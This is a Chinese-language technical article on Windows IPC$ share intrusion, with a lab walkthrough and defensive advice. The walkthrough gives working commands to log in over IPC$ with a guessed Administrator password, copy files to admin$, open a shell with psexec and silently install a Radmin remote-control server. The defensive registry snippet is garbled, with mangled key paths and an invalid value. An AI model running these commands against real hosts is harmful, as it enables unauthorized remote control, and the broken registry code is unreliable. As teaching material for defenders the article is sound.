網(wǎng)絡(luò)安全遵循木桶原理,即整個網(wǎng)絡(luò)環(huán)境中網(wǎng)絡(luò)安全的水平是由該網(wǎng)絡(luò)中防護(hù)水平最弱的計(jì)算機(jī)所決定的。在單位內(nèi)部網(wǎng)絡(luò)中,大部分安全都是建立在基于“信任”的基礎(chǔ)上,而沒有采取安全防范方法,認(rèn)為沒有誰會進(jìn)行破壞,沒有誰會獲取情報(bào)信息。在這種環(huán)境下,遠(yuǎn)程網(wǎng)絡(luò)連接安全是一個不容忽視的安全問題,值得進(jìn)行探討。
什么是IPC
IPC是Internet Process Connection的縮寫,也就是遠(yuǎn)程網(wǎng)絡(luò)連接。它是Windows NT及Windows 2000特有的一項(xiàng)功能。IPC是Windows的一個重要模塊,網(wǎng)上鄰居以及網(wǎng)絡(luò)共享都是通過IPC來實(shí)現(xiàn)的。黑客或者入侵者利用IPC$共享來實(shí)現(xiàn)入侵。網(wǎng)絡(luò)上也常常將利用IPC$來實(shí)現(xiàn)入侵,稱為IPC$漏洞。IPC$連接分為IPC$空連接和帶有一定權(quán)限IPC$連接,IPC$空連接沒有任何權(quán)限,但是可以獲取該主機(jī)的netbios信息;而帶有權(quán)限的IPC$連接則可以執(zhí)行命令和對文件進(jìn)行復(fù)制、刪除和修改等操作,從安全的角度來說,IPC$是一個存在安全隱患的因素。
IPC$入侵原理
IPC$入侵的最主要原理就是獲取被入侵主機(jī)的密碼,利用有權(quán)限的IPC$連接到主機(jī)并復(fù)制文件到主機(jī)上,然后運(yùn)行木馬程序或者執(zhí)行命令來實(shí)現(xiàn)完全控制。如果系統(tǒng)默認(rèn)共享全部打開,通過字典軟件生成用戶口令密碼,再利用某些軟件進(jìn)行用戶登錄密碼的暴力猜解,獲取用戶密碼只是時間問題。因此網(wǎng)絡(luò)遠(yuǎn)程連接(IPC)安全是網(wǎng)絡(luò)安全中一個不容忽視的問題。
常見IPC漏洞攻擊方法
1.利用IPC漏洞應(yīng)具備的條件
(1)知道賬號和口令,且賬號的權(quán)限必須是System以上,本系統(tǒng)中使用是Administator權(quán)限。在絕大多數(shù)環(huán)境中,利用軟件所掃描出來的弱口令一般都是管理員(Administrator)權(quán)限,如圖1所示。
(2)系統(tǒng)沒有禁用遠(yuǎn)程IPC$連接
(3)能夠掃描到對方計(jì)算機(jī)上所開放的445、135或者139端口
2.試驗(yàn)
(1)試驗(yàn)環(huán)境
◆ Windows 2000 Professional +SP4虛擬機(jī)
◆ 系統(tǒng)未安裝殺毒軟件和防火墻
◆ 目標(biāo)機(jī)IP地址為192.168.1.4
◆ 遠(yuǎn)程控制文件R_server.exe、raddrv.dll、AdmDll.dll。除了Radmin以外還有其他的遠(yuǎn)程控制軟件也可以使用。
(2)探測目標(biāo)機(jī)開放端口
◆ 使用sfind工具。使用命令格式為sfind -p 192.168.1.4
◆ 使用NT自動攻擊工具
(3)獲取目標(biāo)機(jī)管理員賬號和密碼
(4)執(zhí)行命令
net use \192.168.1.4ipc$ "123456" /user:"Administrator"
copy *.* \192.168.1. 4admin$ 其中*.*包含所有的控制文件。
psexec \192.168.1.4 cmd
通過命令行方式安裝R_Server。直接在psexec中執(zhí)行以下命令:
netstat -an |find "4899"
regsrc.exe/pass:lovemeloveyou/port:4899/save/silence
regsrc.exe /install /silence
net start r_server
netstat -an |find "4899"
執(zhí)行結(jié)果表示Radmin遠(yuǎn)程控制軟件服務(wù)端安裝成功,然后通過radmin客戶端可以直接對該計(jì)算機(jī)實(shí)施遠(yuǎn)程控制。
安全防范方法
1.管理層次防范方法
在網(wǎng)絡(luò)管理中常流行一句話“三分技術(shù),七分管理”。其實(shí)在網(wǎng)絡(luò)安全中也是“三分技術(shù),七分管理”,安全重在管理。只有意識上的重視才能帶來長久的安全。
(1)安全審計(jì)
密碼的安全是整個網(wǎng)絡(luò)安全中的一個重要因素,因此應(yīng)從審計(jì)的角度加強(qiáng)管理,可以對系統(tǒng)是否安裝殺毒軟件、防火墻軟件、安裝系統(tǒng)補(bǔ)丁、系統(tǒng)設(shè)置密碼等方面進(jìn)行安全審計(jì),并配置一個安全管理人員。
(2)安全知識培訓(xùn)
網(wǎng)絡(luò)安全也是一門技術(shù),它由很多知識構(gòu)成。因此了解和實(shí)施需要一個過程,這個過程就是培訓(xùn)和教育。通過培訓(xùn)來提高安全意識和安全技能,通過知識和法律教育來普及計(jì)算安全知識和計(jì)算機(jī)犯罪方面的法律意識和責(zé)任,增強(qiáng)安全感和責(zé)任感。
2.技術(shù)層次防范方法
(1)查看網(wǎng)絡(luò)連接情況
使用“netstat -an”查看本機(jī)與網(wǎng)絡(luò)的連接情況。該命令可以查看目前所建立的連接,系統(tǒng)所開放的服務(wù)端口。
(2)查看IPC$連接情況
使用“net use”命令查看網(wǎng)絡(luò)共享連接情況,如果顯示結(jié)果是“清單是空的”則表示無IPC$連接。否則會顯示連接的的詳細(xì)信息。
(3)安裝防火墻軟件
(4)關(guān)閉掉缺省共享
關(guān)閉缺省共享有兩種方式,一種是徹底的禁用共享,一種是開機(jī)后刪除共享。
開機(jī)后刪除共享,可以將如下代碼復(fù)制到記事本,然后將其另存為delshare.bat文件,并將其添加到系統(tǒng)的啟動中,這樣系統(tǒng)啟動后就會自動刪除默認(rèn)共享。
net share admin$ /del
net share ipc$ /del
net share c /del
net share d /del
net share e /del
徹底刪除共享,可以直接將以下代碼復(fù)制到文本文件,并保存為delshare.reg文件,然后自己雙擊該文件將其導(dǎo)入注冊表即可。
REGEDIT4
[HKEY_LOCAL_MACHINESYSTEM CurrentControlSetServices lanmanserverparameters]
"AutoShareServer"=dword:00000000
[HKEY_LOCAL_MACHINESYSTEM CurrentControlSetServicesTcpip Parameters]
"DefaultTTL"= 0-0xff
[HKEY_LOCAL_MACHINESYSTEM CurrentControlSetServicesl anmanserverparameters]
"AutoshareWks"=dword:00000000
[HKEY_LOCAL_MACHINESYSTEM CurrentControlSetControlLsa]
(5)禁止Schedule服務(wù)
直接在“開始”-“運(yùn)行”中輸入“services.msc”,在服務(wù)控制面板中停止掉
本文通過對IPC$入侵方法的分析和研究,提出了技術(shù)層次和管理層次的防范。通過以上的分析,可以看出IPC的安全是一個不容忽視的安全問題,因此進(jìn)行網(wǎng)絡(luò)遠(yuǎn)程連接的安全防范是非常必須的。